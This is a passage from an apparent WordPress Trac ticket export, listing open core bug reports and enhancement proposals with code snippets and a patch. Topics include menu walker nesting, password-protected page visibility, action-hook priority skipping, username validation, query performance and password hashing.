subnavigation contained second-level and third-level navigation elements. The problem my colleague was having was that occasionally third-level elements would not be nested underneath their parent element (also in the list of elements) on some pages. My colleague was calling wp_list_pages with an array of page IDs that he wanted to render in the sub-navigation, wp_list_pages then turned the list of page IDs into a list of Page objects, and it sorted the page objects by their 'menu_order' attribute; the third-level navigational elements all had their 'menu_order' set to 0, whereas the second-level navigational elements all had 'menu_order' set to something more than 0 - causing the third-level elements to be the first elements in the list. wp_list_pages later made a call to Walker::walk, passing along that list of pages. Here is a relevant code snippet from Walker::walk: {{{ /* * When none of the elements is top level. * Assume the first one must be root of the sub elements. */ if ( empty($top_level_elements) ) { $first = array_slice( $elements, 0, 1 ); $root = $first[0]; $top_level_elements = array(); $children_elements = array(); foreach ( $elements as $e) { if ( $root->$parent_field == $e->$parent_field ) $top_level_elements[] = $e; else $children_elements[ $e->$parent_field ][] = $e; } } }}} '''The bug is this code's assumption that the first item in $elements is a suitable root-element for the entire list''' (sentence emboldened for anybody not wanting to read the wall of text). wp_list_pages ordered our list by 'menu_order' which put our 3rd-level elements at the top of the list - causing a 3rd-level element to be treated as the navigation's root. I wrote up a quick fix for this (I'm not sure if it's the best fix, I'm not overly experienced in Wordpress), and for our project we'll use wp_list_pages with a custom walker class that implements my fix. Here is the patch of my fix: {{{ Index: public_html/wp-includes/class-wp-walker.php IDEA additional info: Subsystem: com.intellij.openapi.diff.impl.patch.CharsetEP <+>UTF-8 =================================================================== --- public_html/wp-includes/class-wp-walker.php (date 1404915904000) +++ public_html/wp-includes/class-wp-walker.php (revision ) @@ -217,12 +217,34 @@ /* * When none of the elements is top level. - * Assume the first one must be root of the sub elements. + * ~~Assume the first one must be root of the sub elements.~~ Disregard - RJ CGIT 2014-07-09 + * + * ---------- + * + * Modified by Rob Jackson, Castlegate IT; 2014-07-09: + * Do not assume the first element is root, instead loop through the elements + * until we find one whose parent is _not_ in the list of elements. If that fails, + * just fall back to the default behaviour of using the first element. */ if ( empty($top_level_elements) ) { + $root = false; + $element_ids = array_map(function($element){ return $element->ID; }, $elements); + foreach($elements as $element) + { + if (!in_array($element->post_parent, $element_ids)) + { + $root = $element; + break; + } + } + unset($element); + + if ($root === false) + { - $first = array_slice( $elements, 0, 1 ); - $root = $first[0]; + $first = array_slice( $elements, 0, 1 ); + $root = $first[0]; + } $top_level_elements = array(); $children_elements = array(); }}} Kind regards, Rob " rob-castlegate Future Releases 58502 Visiting /wp-admin/options-permalink.php causing Fatal Error Permalinks 6.2.2 normal normal Awaiting Review defect (bug) new close 2023-06-09T10:05:47Z 2023-06-28T15:48:07Z "I'm using WordPress 6.2.2 on PHP 8.1.x `Fatal error: Uncaught ValueError: Unknown format specifier ""<"" in /wp-admin/options-permalink.php:38 Stack trace: #0 /wp-admin/options-permalink.php(38): sprintf() #1 {main} thrown in /wp-admin/options-permalink.php on line 38` Here is the WordPress Health Status: {{{ ### wp-core ### version: 6.2.2 site_language: bn_BD user_language: bn_BD timezone: Asia/Dhaka permalink: /%postname%/ https_status: true multisite: false user_registration: 0 blog_public: 1 default_comment_status: open environment_type: production user_count: 1 dotorg_communication: true ### wp-paths-sizes ### wordpress_path: /home/PATHTRUNCATED wordpress_size: 685.79 MB (719102256 bytes) uploads_path: /home/PATHTRUNCATED/wp-content/uploads uploads_size: 584.80 MB (613205338 bytes) themes_path: /home/PATHTRUNCATED/wp-content/themes themes_size: 7.46 মেগাবাইট (7824982 bytes) plugins_path: /home/PATHTRUNCATED/wp-content/plugins plugins_size: 121.31 MB (127206397 bytes) database_size: 25.04 MB (26253129 bytes) total_size: 1.39 GB (1493592102 bytes) ### wp-dropins (1) ### maintenance.php: true ### wp-active-theme ### name: Twenty Fifteen (twentyfifteen) version: 3.4 author: ওয়ার্ডপ্রেস টিম author_website: https://wordpress.org/%20 parent_theme: none theme_features: core-block-patterns, widgets-block-editor, automatic-feed-links, title-tag, post-thumbnails, menus, html5, post-formats, custom-logo, custom-background, editor-style, editor-styles, wp-block-styles, responsive-embeds, editor-color-palette, editor-gradient-presets, customize-selective-refresh-widgets, custom-header, widgets theme_path: /home/PATHTRUNCATED/wp-content/themes/twentyfifteen auto_update: off ### wp-themes-inactive (1) ### Twenty Twenty-Three: version: 1.1, author: the WordPress team, automated updates is turned off ### wp-mu-plugins (1) ### InfiniteWP - Client Loader: version: 1.0.1, author: Revmakx ### wp-plugins-active (1) ### Maintenano: version: 0.0.1, author: nanodesigns, automated updates is turned off ### wp-media ### image_editor: WP_Image_Editor_GD imagick_module_version: not found imagemagick_version: not found imagick_version: not found file_uploads: File uploads is turned off post_max_size: 8M upload_max_filesize: 2M max_effective_size: 2 মেগাবাইট max_file_uploads: 20 gd_version: 2.3.3 gd_formats: GIF, JPEG, PNG, WebP, BMP, AVIF, XPM ghostscript_version: 9.25 ### wp-server ### server_architecture: Linux 4.18.0-348.20.1.lve.1.el7h.x86_64 x86_64 httpd_software: LiteSpeed php_version: 8.1.18 64bit php_sapi: litespeed max_input_variables: 1000 time_limit: 180 memory_limit: 128M admin_memory_limit: 256M max_input_time: 60 upload_max_filesize: 2M php_post_max_size: 8M curl_version: 7.87.0 OpenSSL/1.1.1p suhosin: false imagick_availability: false pretty_permalinks: true htaccess_extra_rules: true ### wp-database ### extension: mysqli server_version: 10.3.39-MariaDB client_version: mysqlnd 8.1.18 max_allowed_packet: 268435456 max_connections: 151 ### wp-constants ### WP_HOME: undefined WP_SITEURL: undefined WP_CONTENT_DIR: /home/PATHTRUNCATED/wp-content WP_PLUGIN_DIR: /home/PATHTRUNCATED/wp-content/plugins WP_MEMORY_LIMIT: 40M WP_MAX_MEMORY_LIMIT: 256M WP_DEBUG: true WP_DEBUG_DISPLAY: true WP_DEBUG_LOG: false SCRIPT_DEBUG: false WP_CACHE: false CONCATENATE_SCRIPTS: undefined COMPRESS_SCRIPTS: undefined COMPRESS_CSS: undefined WP_ENVIRONMENT_TYPE: undefined DB_CHARSET: utf8mb4 DB_COLLATE: undefined ### wp-filesystem ### wordpress: writable wp-content: writable uploads: writable plugins: writable themes: writable mu-plugins: writable }}}" wzislam Future Releases 16483 Visibility: password-protected exposes multiple pages Security 3.0.4 normal normal Future Release defect (bug) new dev-feedback 2011-02-07T19:02:15Z 2022-01-30T16:40:27Z "1. password protect a page ('protected') with a password 2. password protect another page ('thistoo') with the SAME password 3. visit 'protected' and enter the password. Page is visible 4. visit 'thistoo'; expected: prompt for password. What happens: Page is visible Regardless of whether someone with a password has the right to try it in as many pages as they want (and would therefore successfully see the page if the passwords were the same), the user should still be prompted on a page-by-page basis. Global authentication to multiple pages is possible with user accounts and roles. It should not be possible with visibility: password-protected pages." monkeyhouse Future Releases 16482 Visibility: password-protected breaks with redirected domains Login and Registration 3.0.4 normal normal defect (bug) new dev-feedback 2011-02-07T18:58:45Z 2019-06-04T20:02:37Z "Pre-requisite to reproduce: domain.com must redirect to www.domain.com (haven't tested with other subdomains than www, but I'm sure it would be the same). 1. password protect a page 2. visit domain.com/protected (which redirects to www.domain.com/protected) 3. enter password 4. something about the redirect OR the way the password is stored/checked is broken; you are redirected to the wp-admin (WordPress login) page. Sanity check: 1. password protect a page 2. visit www.domain.com/protected (requiring no subdomain redirect) 3. enter password 4. successful log-in " monkeyhouse Future Releases 31419 Vimeo and YouTube video cannot be inserted into a playlist Media normal normal enhancement new dev-feedback 2015-02-23T09:22:58Z 2019-06-04T20:11:41Z "Now that the video playlist feature is working well in core, it could be great to think about supporting Vimeo and YouTube videos inside playlist. For the record, YouTube videos can be played with the MediaElementJS player with this shortcode : {{{ [video src=""http://youtu.be/_YbVJoMYwJ0""] }}} I would like to introduce the possibility to play this video inside a playlist: {{{ [playlist type=""video"" srcs=""http://youtu.be/_YbVJoMYwJ0,http://youtu.be/Fn1iMmSvvhQ""] }}} Now, there are some challenges : 1. Playlist are managed by selecting attachment form the Media library, along with their meta data (title, poster, ...). How to provide meta data for external videos ? 2. MediaElementJS does not build the player in the same way when a YouTube video is embeded, so switching between videos does not rely on the same API, and switching between YouTube and mp4 videos is not possible The first concern could be addressed by registering an attachment post in the database that links to a YouTube URL instead of a video located in the uploads folder." Fab1en Future Releases 58311 Validate Username for not to be a email and strip everything after @ Login and Registration normal normal Awaiting Review enhancement new dev-feedback 2023-05-14T18:09:52Z 2023-08-15T12:07:25Z "Right now it is possible to register user and place full email as Username and username is not supposed to be changed after. When site administrator is adding someone manually, it can be done easily as a mistake and reviling author's email for everyone to see and can be picked up from authors archive as well. Display name can be changed after, but it needs to be done manually, by default Username, Nickname and the Display name are equal. If some people already have @ in their usernames (and I think I've seen that somewhere), the only thing which can be done about this is to filter the Display name before output and strip the @ and everything after." oglekler Future Releases 40393 Using remove_action within an action callback skips over execution of other callbacks with lower priority Plugins normal major Awaiting Review defect (bug) new dev-feedback 2017-04-07T16:01:05Z 2020-07-07T14:23:02Z "Description: When remove_action is used by an action callback to remove itself from the list of callbacks, this results in all callbacks hooked with the immediately lower priority to be skipped by apply_filters. Here is simple code to demonstrate: {{{#!php <?php class Sample { public function test() { add_action('custom_action', array($this, 'callback_1'), 1); add_action('custom_action', array($this, 'callback_2')); add_action('custom_action', array($this, 'callback_3'), 20); echo '<h1>First Run</h1>'; echo '<pre>'; do_action('custom_action'); echo '</pre>'; echo '<h1>Second Run</h1>'; echo '<pre>'; do_action('custom_action'); echo '</pre>'; } public function callback_1() { echo ""Callback 1\n""; } public function callback_2() { echo ""Callback 2\n""; remove_action('custom_action', array($this, 'callback_2')); } public function callback_3() { echo ""Callback 3 - Priority 20\n""; } } $runner = new Sample; $runner->test(); }}} The output is: First Run Callback 1 Callback 2 Second Run Callback 1 Callback 3 - Priority 20 The expected output should be: First Run Callback 1 Callback 2 Callback 3 - Priority 20 Second Run Callback 1 Callback 3 - Priority 20 The net effect of this issue is that a plugin using remove_action in that way will break another, totally unrelated plugin, if they both add actions on same tag, with different prorities. WooCommerce is using this method, it uses remove_action inside a pre_get_posts action callback. This broke our Accelerated Mobile Pages plugin when doing AMP pages for WooCommerce. This was reported to [https://github.com/woocommerce/woocommerce/issues/14092 WooCommerce here], but it was then suggested it was a core issue. '''Additional notes''': - all callbacks must '''object methods'''. The problem does not occur if callbacks are functions. - the callback using remove_action must be the only registered callback for that priority level {{{#!php <?php add_action('custom_action', array($this, 'callback_1')); add_action('custom_action', array($this, 'callback_2')); add_action('custom_action', array($this, 'callback_3'), 20); add_action('custom_action', array($this, 'callback_4'), 20); }}} will not cause the issue, all callbacks are executed. {{{#!php <?php add_action('custom_action', array($this, 'callback_1'), 5); add_action('custom_action', array($this, 'callback_2')); add_action('custom_action', array($this, 'callback_3'), 20); }}} will cause the issue, callback_3 is not executed. - only the next priority level is removed (but all callbacks for that level are removed): {{{#!php <?php add_action('custom_action', array($this, 'callback_1'), 1); add_action('custom_action', array($this, 'callback_2')); add_action('custom_action', array($this, 'callback_3'), 15); add_action('custom_action', array($this, 'callback_4'), 20); }}} will cause callback_3 to be skipped and callback_4 to be executed normally {{{#!php <?php add_action('custom_action', array($this, 'callback_1'), 1); add_action('custom_action', array($this, 'callback_2')); add_action('custom_action', array($this, 'callback_3'), 20); add_action('custom_action', array($this, 'callback_4'), 20); }}} will cause both callback_3 and callback_4 to be skipped '''Related''': the following tickets are related, even duplicates, but are marked as fixed, which is why I am opening this ticket: [https://core.trac.wordpress.org/ticket/33144 #33144], [https://core.trac.wordpress.org/ticket/21169 21169], [https://core.trac.wordpress.org/ticket/37679 37679]" weeblrpress Future Releases 55133 Using an array containing a single object as first $arg in do_action() Plugins normal normal Awaiting Review defect (bug) new dev-feedback 2022-02-10T07:55:43Z 2022-06-17T09:36:19Z "When passing an array containing 1 single object as the first argument of `do_action()`, the array is automatically flattened and all functions triggered by the hook will receive a single object as the first argument (instead of an array). **Example:** {{{#!php $var = [ (object) [ 'key' => 'name', 'value' => 'Pierre', ] ]; do_action( 'hook_name', $var ); }}} Any function hooked to `hook_name` receives this first argument: {{{#!php stdClass Object ( [key] => name [value] => Pierre ) }}} …instead of an array containing this object. I've found that this is because of some **PHP4** backward compatibility in the `do_action()` function: {{{#!php } elseif ( is_array( $arg[0] ) && 1 === count( $arg[0] ) && isset( $arg[0][0] ) && is_object( $arg[0][0] ) ) { // Backward compatibility for PHP4-style passing of `array( &$this )` as action `$arg`. $arg[0] = $arg[0][0]; } }}} This is a weird and unexpected behavior, could we add an additional condition in this `elseif` in order to check for the PHP version to apply this hack?" pskli Future Releases 37917 Users without the edit_private_posts capability can still create private posts Posts, Post Types 2.1 normal normal Awaiting Review defect (bug) new dev-feedback 2016-09-01T21:32:26Z 2019-04-19T13:20:11Z "Currently, users without the ""edit_private_posts"" capability, can still view the ""Private"" radio button under ""Visibility"". They can also save / publish the post (depending on their capabilities) with no issue. The same goes for pages as well with the ""edit_private_pages"" capability. I think it's reasonable enough to assume that users that don't have the ""edit_private_{post_type}"" capability, shouldn't be able to create posts with a visibility of private." ryan.kanner Future Releases 14757 users with no posts are not exported Export 3.1 normal normal Future Release enhancement reopened dev-feedback 2010-09-01T18:14:31Z 2020-07-06T14:48:39Z I just exported a large standalone site and imported into a multisite setup, and I discovered that a number of users who hadn't yet posted anything didn't get moved to the new site. sillybean Future Releases 42957 Usernames ending in a period generate invalid reset password links in certain email clients hellofromTonya Users normal normal Future Release defect (bug) assigned dev-feedback 2017-12-21T16:51:13Z 2022-04-29T05:59:01Z "Password reset links contain the username appended to the end of the URL. If the user name ends in a period the email client has to decide if the period is part of the URL or part of the punctuation of the sentence. For example: <https://some-wordpress-site.com/wp-login.php?action=rp&key=V4LSmgBcwtqvFPEiFt0e&login=p.o.> Gmail generates a clickable link that stops short of the final period. Outlook successfully links the entire URL." paulcline Future Releases 44690 Username should not accept space Users normal normal Awaiting Review enhancement new dev-feedback 2018-08-01T11:19:00Z 2021-02-27T16:17:02Z "The `username` field accepts `space`, not leading or trailing ones though. Space is usually not in the list of accepted characters. I am not sure if it is there in purpose. Ideally it should not accept this character. `Username` also accepts `@`, which is not an issue. But the problem starts when the username looks like an email address! When sending verification requests for Export and Erase private data the issue can be noticed. However, if `username` has to accept `@`, WordPress should first check whether it is validating email address pattern. If it does, I think that should be reported rather than allowing it to get saved. I explained the above issue in #44683." subrataemfluence Future Releases 34927 user_url and user_email length too short Users normal normal Awaiting Review enhancement new dev-feedback 2015-12-09T06:26:38Z 2018-05-14T19:32:04Z "I have been adding users to my client's site with no issues, until I got to a user with a .edu email address. I add the user details as normal. Click the Add New User button and get the message ""New user created"". No error message at all. But the user has not been created. I tried 3 times, same result. I have turned off all plugins and changed to the wordpress default theme (2015). Same issue. What I expect to happen: When I add a user I expect them to be added to the Users list. What happens: when I add a user with a .edu email address, there is no error message, I get message ""New user created"", but the user is not in the user's list. These users should also appear in the Author drop down in posts (because they are added with Author role), but the new user does not appear in the Author dropdown eiither. Using Firefox 42.0 on Mac OS X Yosemite. Same issue happens with Safari 9.0.1 on Mac OS X Yosemite. " DonnaMiller Future Releases 22895 user_can_admin_menu() is Type-Insensitive for Users who Can't Create Pages johnbillion* Role/Capability 3.5 normal normal Future Release defect (bug) accepted dev-feedback 2012-12-12T18:32:53Z 2023-02-19T01:20:07Z "Utilization of the new separation edit_posts /create_posts capability separation reveals a flaw in admin menu privilege checking. The issue occurs when: 1. For any post type other the ""post"", the user has $type->cap->edit_posts but not $type->cap->create_posts 2. User also does not have a manage_terms capability for any associated taxonomies In that situation, access to ""edit.php?post_type=whatever"" fails unless the user has the ""edit_posts"" cap for the ""post"" type. This occurs because: 1. '''wp-admin/includes/menu.php''' removes solitary submenus that have the same destination as the parent 2. '''get_admin_page_parent()''' returns nullstring if there is no $submenu item 3. '''user_can_access_admin_page()''' performs a type-sensitive capability check only if get_admin_page_parent() returns an existing $submenu key. For now, my plugin workaround is to hook into 'admin_menu' and add a dummy submenu with nullstring caption. " kevinB Future Releases 44814 User table same schema, single and multisite Networks and Sites 3.3 normal normal Future Release enhancement new dev-feedback 2018-08-19T16:16:33Z 2019-01-25T17:28:07Z Currently, there is a difference between the users table database schema between single and multisite. I think this is problematic, as it is an unnecessary difference between single and multisite. It means conditional logic that is unnecessary and could make issues for developers querying the users table. spacedmonkey Future Releases 34316 User status inconsistent between single-site & multisite Users 1.5 normal normal Awaiting Review enhancement new needs-unit-tests 2015-10-15T19:00:15Z 2017-09-27T15:30:10Z "The way a user's status is defined in WordPress differs between single-site and multisite: * In single-site, the `user_status` column is used * In multisite, there are two additional columns for `spam` and `deleted` Not only this, but the `update_user_status()` function is multisite only, and the `user_status` column is an integer without an API to help announce what values equate to what results. On the plus side, user statuses aren't really ever used in core. Marking users as spammers in multisite installations is the only real benefit of this feature as it exists today. I'd like to propose the following: * Stop creating the the `spam` and `deleted` columns in `wp_users` on new installations * ALTER the `user_status` column from `INT(11)` to `VARCHAR(20)` ala `wp_posts` * A bevy of `wp_register_user_status()` like functions to introduce bonafide support for them * A database upgrade routine to move user status `0` to `active` and `1` to `spammer` * A new index on the `wp_users` table for the updated `user_status` column type. We may need a few, based on how users are commonly queried in core, BuddyPress, etc... * Update the `WP_User` and `WP_User_Query` classes to suss out any `user_status` inconsistencies A few considerations worth noting: * Large installations would need to manually perform these DB upgrades. I'm embarrassed to say I've personally frozen WordPress.org for several minutes years ago by missing a `DO_NOT_UPGRADE_GLOBAL_TABLES` check on the `wp_users` table * Several plugins use their own values in the `users_status` column, assuming their numeric ID is unique and special. The authors of these plugins would need notifying, and their code updating to support the above ideas * This work *could* parlay into the Post Status API that's on infinite back-burner. There are some really excellent ideas floating around about how `post_status` could work that would translate nicely to users, too" johnjamesjacoby Future Releases 57398 "User roles are reset to ""All"" tabs when performing bulk actions on certain user roles." General normal normal Awaiting Review enhancement new dev-feedback 2022-12-29T14:11:19Z 2023-02-17T08:41:22Z "Whenever bulk actions are performed on certain roles and applied, the page reloads back to the ""All"" roles. This makes performing Bulk Actions on certain roles tedious if we have to do it multiple times as we need to switch to the role again. Issue Video Link => [https://share.cleanshot.com/wSHt0nxqtGWkFlPgsq8h] " aezazshekh Future Releases 33542 User preferences API idea Users normal normal Future Release feature request new dev-feedback 2015-08-25T15:39:53Z 2017-02-05T22:49:03Z "When setting up a new site, many site Settings seem at first like user preferences even though they aren't. For sites with 1 user blogging out to the world, this makes sense, but for more robust installations a single set of site settings does not satisfy all users. I'd like to propose a user preferences API be invented. This API would consist of a series of functions that connect usermeta to site & network options, and when invoked, will traverse the user/site/network hierarchy and use the first available setting. Something like: {{{ $language = wp_get_user_preference( $user_id, 'WPLANG' ); }}} Imagine then, that `wp_get_user_preference()` would first look in `wp_usermeta`, then in `wp_options` and then in `wp_sitemeta` if multisite. This is obviously a fuzzy example, and there are less obvious caveats (like what to do when usermeta keys do not match option keys, etc...) which can all be conditionally addressed as we poke holes in the idea. ---- Here are a few settings that could be candidates, taken from their verbiage in various administration screens: General * Timezone * Date format * Time format * Start of week * Language Writing * Formatting * Default Post Category * Default Post Format Reading * Blog pages show at most * Syndication feeds show the most recent Discussion * Default article settings * Email me whenever * Avatar Display" johnjamesjacoby Future Releases 59324 User list Users 5.2.2 normal normal Awaiting Review defect (bug) new dev-feedback 2023-09-11T11:22:54Z 2023-09-13T03:40:28Z "Hello, I have the site and operates well. But suddenly, the Users menu from dashboard, I can not see the users list even I've loggined as a admin. [[Image(https://imgur.com/a/NxdJG85)]] From the back-end, it seems there are the data in there, but seems the front-end is not displaying the list. Is there any similar case reported? So far, I deactivated all plug-in, but no sucess. I have checked the wp-admin/users.php file but no problem. Please let me know where I can look for. Thanks. " kylechoi Future Releases 56689 Use WP_Query in get_page_by_path spacedmonkey Query normal normal Future Release enhancement reopened dev-feedback 2022-09-29T10:35:58Z 2023-02-07T04:15:36Z Use `WP_Query` in `get_page_by_path`, this this correctly primes caches and is cached itself. spacedmonkey Future Releases 45839 Use site meta for blog details Networks and Sites 4.6 normal normal Awaiting Review enhancement new dev-feedback 2019-01-05T06:32:13Z 2020-03-29T18:18:06Z Currently details about each site is received from each site's options. This means, that every time a WP_Site object is loaded, it may end up calling switch_to_blog. This is expensive and wasteful. This fields should be cached in site meta, which will improve load times and makes it easier to manage. spacedmonkey Future Releases 42883 Use sargable queries for date-based lookups for posts Query 3.7 normal normal Future Release enhancement new dev-feedback 2017-12-12T16:17:14Z 2022-06-14T11:57:10Z "Related to #41054 but a very specific and actionable, high-impact instance is the fact that the WordPress lookup for permalinks involving dates is not sargable. For a bog-standard permalink structure %year%/%slug%/, WP generates the following query: {{{ SELECT wp_posts.* FROM wp_posts WHERE 1=1 AND ( YEAR( wp_posts.post_date ) = 2017 ) AND wp_posts.post_name = 'tahoma-vs-verdana' AND wp_posts.post_type = 'post' ORDER BY wp_posts.post_date DESC }}} This runs (as a cold query) in ~0.075 seconds on a dedicated (and overpowered) MariaDB 10 instance on a pretty small WordPress DB. While indexes exist for all the fields matched against in the query, the use of {{{AND ( YEAR( wp_posts.post_date ) = 2017 )}}} cannot be matched against the database because MySQL/MariaDB is not intelligent enough to optimize that constraint. The ""same"" query adjusted to make the match against {{{post_date}}} sargable does the same in ~0.034 seconds (half the time): {{{ SELECT wp_posts.* FROM wp_posts WHERE 1=1 AND wp_posts.post_date >= DATE(""2017-01-01"") AND wp_posts.post_date < DATE(""2018-01-01"") AND wp_posts.post_name = 'tahoma-vs-verdana' AND wp_posts.post_type = 'post' ORDER BY wp_posts.post_date DESC }}} The same would apply for permalinks that reference the month and day, of course." ComputerGuru Future Releases 40748 Use REST API for Community Events REST API 4.8 normal normal Future Release enhancement new needs-unit-tests 2017-05-12T17:39:23Z 2020-10-25T03:56:50Z "#40702 introduced new Community Events to the News widget on the Dashboard screen, but it uses admin-AJAX. Converting to the REST API is a good opportunity to lay some groundwork for migration the rest of wp-admin in the future. The work for this was started in #40702, but it'll be easier to keep track of with a new ticket. I'm working on an updated version of `40702.11.diff` and will upload it soon." iandunn Future Releases 57725 Use of rand() function instead of wp_rand() Filesystem API normal normal Awaiting Review enhancement new changes-requested 2023-02-15T11:14:13Z 2023-06-21T11:00:43Z "Filesystem API function {{{wp_edit_theme_plugin_file}}} using PHP {{{rand()}}} function rather than WP's {{{wp_rand()}}}. Can we enhance this as {{{rand()}}} is discouraged? File path: wp-admin/includes/file.php Line: 524 and 526 " haritpanchal Future Releases 53998 Use network_home_url() instead of $_SERVER['HTTP_HOST'] for added safety. General normal normal Awaiting Review enhancement new dev-feedback 2021-08-24T23:29:09Z 2022-08-07T18:04:12Z "Would it not be safer from XSS if uses of **$_SERVER[''HTTP_HOST'']** were replaced with **network_home_url()**? It looks to me like **network_home_url()** reads the server host name from the site settings instead of relying on a possibly manipulated **$_SERVER[''HTTP_HOST'']** value. For example, I came across this code in /wp-admin/includes/class-wp-list-table.php... {{{#!php <?php /** * Displays the pagination. * * @since 3.1.0 * * @param string $which */ protected function pagination( $which ) { ... $current_url = set_url_scheme( 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'] ); ... } }}} Wouldn't this be safer if it were re-written as... {{{#!php <?php /** * Displays the pagination. * * @since 3.1.0 * * @param string $which */ protected function pagination( $which ) { ... $current_url = network_home_url( $_SERVER['REQUEST_URI'] ); ... } }}} A search through the WP source code shows **$_SERVER[''HTTP_HOST'']** is used 27 times across 15 files." wp_kc Future Releases 36652 Use meta_value in a meta query to decide type format in SQL clause ericlewis Query normal normal enhancement reviewing dev-feedback 2016-04-23T19:27:08Z 2019-06-04T20:57:29Z "The SQL clause generated for a meta query [https://github.com/WordPress/WordPress/blob/4.5/wp-includes/class-wp-meta-query.php#L628 quotes the `meta_value` in a string]. This means that if there's a post with a postmeta field for likes set to 2 and you run the query looking for posts with 10 or more likes {{{ #!php <?php $query = new WP_Query( array( 'meta_query' => array( array( 'key' => 'likes', 'value' => 10, 'compare' => '>=' ) ) ) ); }}} the query will return the post with 2 likes. This is because the SQL is doing a string comparison, as both the column value and the compared-to value are strings. The fix for the developer is to supply a `type` parameter like `NUMERIC` in the meta query clause which coerces a numeric MySQL comparison. We could use the meta_value's type to decide the type format the value takes in the SQL clause, so that a query like this works as expected without the `type` parameter. This was [https://core.trac.wordpress.org/ticket/27272#comment:13 suggested] by @boone in #27272." ericlewis Future Releases 48816 Use get_bloginfo in the REST API index REST API 4.4 normal normal Awaiting Review enhancement new dev-feedback 2019-11-27T19:35:39Z 2019-11-29T18:39:35Z "The REST API provides data in the site ""index"" when making a request to `https://example.org/wp-json`. This describes the site and the APIs available. In particular it returns the name of the website, and the tagline. These values are retrieved using `get_option` directly instead of `get_bloginfo`. Because this data would be used presentationally, it seems like it'd be more useful if it returned the ""presentation"" version of these strings. As far as I could tell, the index has more or less worked the same since the GSOC version of the REST API, so I wasn't able to find any description of why it was built that way. I opened this because of [https://github.com/WordPress/gutenberg/pull/18760 a Gutenberg PR] which would display the site title." TimothyBlynJacobs Future Releases 21022 Use bcrypt for password hashing; updating old hashes Security 3.4 normal major Future Release enhancement new dev-feedback 2012-06-20T01:34:26Z 2023-05-08T14:34:44Z "Hi, following recent discussions on password security and how to best prevent any hackers can leverage password table they might have got I looked into the phpass used for WordPress. While I in principle understand why WordPress uses the compatibility mode of it, I would like to see some flexibility for those who don't need the compatibility. Thus I would propose to change in wp-includes/pluggable.php all occurances of {{{ $wp_hasher = new PasswordHash(8, true); }}} to {{{ $wp_hasher = new PasswordHash(8, apply_filters('phpass_compatibility_mode', true)); }}} This would allow users to easily change via plugin from the ""not so secure"" compatibility mode (only salted MD5) of phpass to a more secure setting (bcrypt) in case no compatibility with other applications is required. The plugin changing the encryption methog could then as easy as {{{ function phpass_bcrypt() { return false; } add_filter('phpass_compatibility_mode', 'phpass_bcrypt'); }}}" th23 Future Releases 56070 Use a consistent order of annotations in the test suite Build/Test Tools normal normal Future Release task (blessed) new dev-feedback 2022-06-24T22:18:01Z 2023-10-17T00:41:32Z "WordPress core has an [https://developer.wordpress.org/coding-standards/inline-documentation-standards/php/#docblock-formatting established DocBlock format] for inline documentation: {{{ /** * Summary. * * Description. * * @since x.x.x * * @see Function/method/class relied on * @link URL * * @global type $varname Description. * @global type $varname Description. * * @param type $var Description. * @param type $var Optional. Description. Default. * @return type Description. */ }}} This is more or less consistently applied in core, which is helpful for reusing this template for newly added functions without the guesswork of where to put each particular tag. Unit tests also use some of these tags: * `@since` * `@see` * `@global` * `@param` * `@return` (for tests with dependencies) as well as some [https://make.wordpress.org/core/handbook/testing/automated-testing/writing-phpunit-tests/#annotations test-specific annotations]: * [https://phpunit.readthedocs.io/en/9.5/annotations.html#ticket `@ticket`] * [https://phpunit.readthedocs.io/en/9.5/annotations.html#group `@group`] * [https://phpunit.readthedocs.io/en/9.5/annotations.html#covers `@covers`] * [https://phpunit.readthedocs.io/en/9.5/annotations.html#depends `@depends`] * [https://phpunit.readthedocs.io/en/9.5/annotations.html#requires `@requires`] * [https://phpunit.readthedocs.io/en/9.5/annotations.html#dataprovider `@dataProvider`] * `@expectedDeprecated` * `@expectedIncorrectUsage` However, the order of these annotations differs in various test classes and can be almost random even in test methods of the same class. These inconsistencies increase cognitive load when writing new tests or reviewing test PRs to bring them in line with existing tests. I would like to propose a DocBlock template that can be consistently applied across the test suite. Something like: {{{ /** * Summary. * * Description. * * @since x.x.x * @ticket 12345 * * @group group_name_1 * @group group_name_2 * * @covers function_name_1 * @covers function_name_2 * * @requires function function_name * * @expectedDeprecated * @expectedIncorrectUsage * * @see Function/method/class relied on * @link URL * * @depends test_name * @dataProvider data_provider_name * * @global type $varname Description. * @global type $varname Description. * * @param type $var Description. * @param type $var Optional. Description. Default. * @return type Description. */ }}} Notes: * All of these annotations are optional and may not be present on a particular test, so most of the time the DocBlock would be much shorter. But if they are present, the order should be consistent across the test suite. * `@since` and `@ticket` are grouped together because they are both related to when a test was introduced. * `@group` and `@covers` are separated into their own sections for better readability when a test belongs to multiple groups and/or covers multiple functions. * `@depends` and `@dataProvider` are grouped together and moved closer to globals and parameters, because they are both related to passing data to the test. When reviewing the current usage of `@depends` in the test suite, I found some instances that don't pass any data but seem to (incorrectly) assume that this annotation defines the order in which the tests are executed. That can be addressed separately. Any thoughts on using this DocBlock format or any suggestions for improving it are welcome." SergeyBiryukov Future Releases 16830 url_to_postid() doesn't resolve attachments when rewrite rules are disabled Rewrite Rules 1.2 normal normal enhancement reopened needs-unit-tests 2011-03-11T01:09:14Z 2019-06-04T21:06:33Z "The code of {{{url_to_postid()}}} is pretty clear in the case of disabled rewrite rules: all URLs not using the {{{p=N}}}, {{{page_id=N}}} or {{{attachment_id=N}}} forms are not parsed and the function return 0. That make sense. Now there is a special case for attachments. Attachments can be saved under a the {{{/wp-content/uploads/year/month/}}} folder structure while rewrite rules are disabled at the same time. This means there is a missed opportunity for {{{url_to_postid()}}} to resolve attachment's URLs of the long-form when rewrite rules are disabled. This was tested and reproduced on WordPress 3.1." anonymized_154007 Future Releases 17771 URL-encoded comment_author_url gets broken by MySQL varchar 200 length limit SergeyBiryukov Comments 3.2 normal normal Future Release defect (bug) reviewing dev-feedback 2011-06-12T03:46:44Z 2017-03-18T17:38:56Z "!WordPress sometimes pings back with long permalinks that exceed comment_author_url column length limit of 200, which results in generating unusable broken links to the post. It easily reaches to the limit, especially if the permalink contains url-encoded multibyte title as postname. (e.g. 23 characters of UTF-8 Japanese become a 207 characters long url-encoded string. Incomplete url-encoded string may trigger 400 Bad Request too.) '''Solution:''' In pingback(), use shortlink instead of regular permalink if the URL is longer than 200 characters. It seems to work ok with wp.me shortlinks." tenpura Future Releases 11856 URL for 1st comments page is not canonical markjaquith Canonical 3.0 normal normal Future Release defect (bug) new dev-feedback 2010-01-10T19:17:42Z 2023-10-19T20:04:59Z "When WP generates URL for comments, it always includes comments page number. It should not do this when URL is for 1st comments page - in this case post URL is sufficient. 